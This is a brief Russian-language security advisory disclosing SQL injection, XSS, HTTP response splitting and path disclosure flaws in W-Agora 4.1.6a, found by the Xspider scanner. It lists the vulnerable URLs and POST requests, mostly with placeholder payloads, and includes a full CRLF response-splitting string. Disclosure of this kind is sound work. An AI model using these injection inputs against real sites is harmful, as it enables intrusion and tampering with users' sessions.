Программа: W-Agora 4.1.6a 

Несколько уязвимостей обнаружено в W-Agora. Удаленный пользователь может внедрить SQL команды. Удаленный пользователь может выполнить XSS и HTTP response splitting нападение. Удаленный пользователь может определить инсталляционный путь. 

1. SQL injection 

redir_url.php?bn=demos_links&key=[SQL]

2. XSS in GET: 

download_thread.php?site=support&bn=support_install&thread=[XSS
code here]

3. XSS in POST: 

POST /login.php HTTP/1.1
Host: w-agora
Content-Type: application/x-www-form-urlencoded
Content-Length: 89
loginform=1&redirect_url=1&loginuser=[XSS code here]&loginpassword=1

POST /forgot_password.php HTTP/1.1
Host: w-agora
Content-Type: application/x-www-form-urlencoded
Content-Length: 48
go=1&userid=[XSS code here]

4. HTTP response splitting 

/subscribe_thread.php?site=support&bn=support_instal l&thread=%0d%0aContent-Length:%200%
0d%0a%0d%0a%20200%20OK%0d%0aConte nt-Type:%20text/html%0d%0aContent-Length:%
2034%0d%0a%0d%0a%3chtml%3eScan ned%20by%20PTsecurity%3c/html%3e%0d%0a

5. Раскрытие пути 

/list.php?bn=support_install&last=19&collapse=|id|

Данные уязвимости были обнаружены в результате автоматической проверки Web приложений сканером безопасности Xspider.

Оставить мнение